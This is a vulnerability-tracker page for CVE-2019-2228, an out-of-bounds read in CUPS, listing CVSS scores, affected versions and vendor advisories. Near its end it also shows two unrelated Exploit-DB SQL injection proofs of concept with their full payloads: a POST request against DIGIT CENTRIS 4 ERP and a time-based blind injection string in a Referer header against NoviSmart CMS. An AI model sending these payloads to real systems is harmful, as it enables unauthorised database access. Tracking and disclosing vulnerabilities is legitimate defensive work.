CVE-2019-2228
published 2019-12-06CVE-2019-2228: In array_find of array.c, there is a possible out-of-bounds read due to an incorrect bounds check. This could lead to local information disclosure in the…
PriorityP423medium5.5CVSS 3.1
AVLACLPRLUINSUCHINAN
EPSS
0.20%
10.5th percentile
In array_find of array.c, there is a possible out-of-bounds read due to an incorrect bounds check. This could lead to local information disclosure in the printer spooler with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9 Android-10Android ID: A-111210196
Affected
14 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apple | cups | >= 0 < 2.3.1-1 | 2.3.1-1 |
| apple | cups | >= 0 < 2.3.1-1 | 2.3.1-1 |
| apple | cups | >= 0 < 2.3.1-1 | 2.3.1-1 |
| apple | cups | >= 0 < 2.3.1-1 | 2.3.1-1 |
| apple | cups | >= 0 < 2.1.3-4ubuntu0.11 | 2.1.3-4ubuntu0.11 |
| apple | cups | >= 0 < 2.2.7-1ubuntu2.8 | 2.2.7-1ubuntu2.8 |
| apple | cups | >= 0 < 2.3.1-9ubuntu1.1 | 2.3.1-9ubuntu1.1 |
| debian | cups | < cups 2.3.1-1 (bookworm) | cups 2.3.1-1 (bookworm) |
| android | — | — | |
| android | — | — | |
| android | — | — | |
| android | — | — | |
| android | — | — | |
| android | — | — |
CVSS provenance
nvdv3.15.5MEDIUMCVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
nvdv2.04.9MEDIUMAV:L/AC:L/Au:N/C:C/I:N/A:N
osv5.5MEDIUM
vendor_debian5.5MEDIUM
vendor_ubuntu5.5MEDIUM
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-6xpc-pxw7-qhg3: In array_find of array
ghsa_unreviewed·2022-05-24
CVE-2019-2228 [MEDIUM] GHSA-6xpc-pxw7-qhg3: In array_find of array
In array_find of array.c, there is a possible out-of-bounds read due to an incorrect bounds check. This could lead to local information disclosure in the printer spooler with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9 Android-10Android ID: A-111210196
OSV
cups vulnerabilities
osv·2020-04-27·CVSS 5.5
CVE-2019-2228 [MEDIUM] cups vulnerabilities
cups vulnerabilities
It was discovered that CUPS incorrectly handled certain language values. A
local attacker could possibly use this issue to cause CUPS to crash,
leading to a denial of service, or possibly obtain sensitive information.
This issue only applied to Ubuntu 16.04 LTS, Ubuntu 18.04 LTS, and Ubuntu
19.10. (CVE-2019-2228)
Stephan Zeisberg discovered that CUPS incorrectly handled certain malformed
ppd files. A local attacker could possibly use this issue to execute
arbitrary code. (CVE-2020-3898)
OSV
CVE-2019-2228: In array_find of array
osv·2019-12-06·CVSS 5.5
CVE-2019-2228 [MEDIUM] CVE-2019-2228: In array_find of array
In array_find of array.c, there is a possible out-of-bounds read due to an incorrect bounds check. This could lead to local information disclosure in the printer spooler with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9 Android-10Android ID: A-111210196
Ubuntu
CUPS vulnerabilities
vendor_ubuntu·2020-04-27·CVSS 5.5
CVE-2019-2228 [MEDIUM] CUPS vulnerabilities
Title: CUPS vulnerabilities
Summary: Several security issues were fixed in CUPS.
It was discovered that CUPS incorrectly handled certain language values. A
local attacker could possibly use this issue to cause CUPS to crash,
leading to a denial of service, or possibly obtain sensitive information.
This issue only applied to Ubuntu 16.04 LTS, Ubuntu 18.04 LTS, and Ubuntu
19.10. (CVE-2019-2228)
Stephan Zeisberg discovered that CUPS incorrectly handled certain malformed
ppd files. A local attacker could possibly use this issue to execute
arbitrary code. (CVE-2020-3898)
Instructions: In general, a standard system update will make all the necessary changes.
Android
CVE-2019-2228: Android Security Bulletin 2019-12-01
CVE: CVE-2019-2228
Severity: HIGH
Type: ID
Affected AOSP versions: 8
vendor_android·2019-12-01·CVSS 5.5
CVE-2019-2228 [MEDIUM] CVE-2019-2228: Android Security Bulletin 2019-12-01
CVE: CVE-2019-2228
Severity: HIGH
Type: ID
Affected AOSP versions: 8
Android Security Bulletin 2019-12-01
CVE: CVE-2019-2228
Severity: HIGH
Type: ID
Affected AOSP versions: 8.0, 8.1, 9, 10
References: A-111210196
[2]
Debian
CVE-2019-2228: cups - In array_find of array.c, there is a possible out-of-bounds read due to an incor...
vendor_debian·2019·CVSS 5.5
CVE-2019-2228 [MEDIUM] CVE-2019-2228: cups - In array_find of array.c, there is a possible out-of-bounds read due to an incor...
In array_find of array.c, there is a possible out-of-bounds read due to an incorrect bounds check. This could lead to local information disclosure in the printer spooler with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9 Android-10Android ID: A-111210196
Scope: local
bookworm: resolved (fixed in 2.3.1-1)
bullseye: resolved (fixed in 2.3.1-1)
forky: resolved (fixed in 2.3.1-1)
sid: resolved (fixed in 2.3.1-1)
trixie: resolved (fixed in 2.3.1-1)
No detection rules found.
Exploit-DB
DIGIT CENTRIS 4 ERP - 'datum1' SQL Injection
exploitdb·2019-09-19
DIGIT CENTRIS 4 ERP - 'datum1' SQL Injection
DIGIT CENTRIS 4 ERP - 'datum1' SQL Injection
---
# Exploit Title: DIGIT CENTRIS 4 ERP - 'datum1' SQL Injection
# Date: 2019-09-19
# Exploit Author: n1x_ [MS-WEB]
# Vendor Homepage: http://www.digit-rs.com/
# Product Homepage: http://digit-rs.com/centris.html
# Version: Every version
# CVE : N/A
# Vulnerable parameters: datum1, datum2, KID, PID
# [POST REQUEST]
POST /korisnikinfo.php HTTP/1.1
Content-Length: 65
Content-Type: application/x-www-form-urlencoded
Referer: http://host
Host: host
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
ListaPDF=Lista%20u%20PDF&datum1=1'"&datum2=01.01.2001'"&KID=1'"&PID=1'"
Exploit-DB
NoviSmart CMS - SQL injection
exploitdb·2019-07-24
NoviSmart CMS - SQL injection
NoviSmart CMS - SQL injection
---
# Exploit Title: NoviSmart CMS SQL injection
# Date: 23.7.2019.
# Exploit Author: n1x_ [MS-WEB]
# Vendor Homepage: http://www.novismart.com/
# Version: Every version
# CVE : CWE-89
Vulnerable parameter: Referer (HTTP Header field)
[GET Request]
GET / HTTP/1.1
Referer: if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Client-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded-Host: localhost
Accept-Language: en
Via: 1.1 wa.www.test.com
Origin: http://www.test.com/
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=24769012200df6ccd9002dbf5b978e9c; language=1
Host: host
Co
No writeups or analysis indexed.
https://lists.debian.org/debian-lts-announce/2019/12/msg00030.htmlhttps://source.android.com/security/bulletin/2019-12-01https://usn.ubuntu.com/4340-1/https://lists.debian.org/debian-lts-announce/2019/12/msg00030.htmlhttps://source.android.com/security/bulletin/2019-12-01https://usn.ubuntu.com/4340-1/
2019-12-06
Published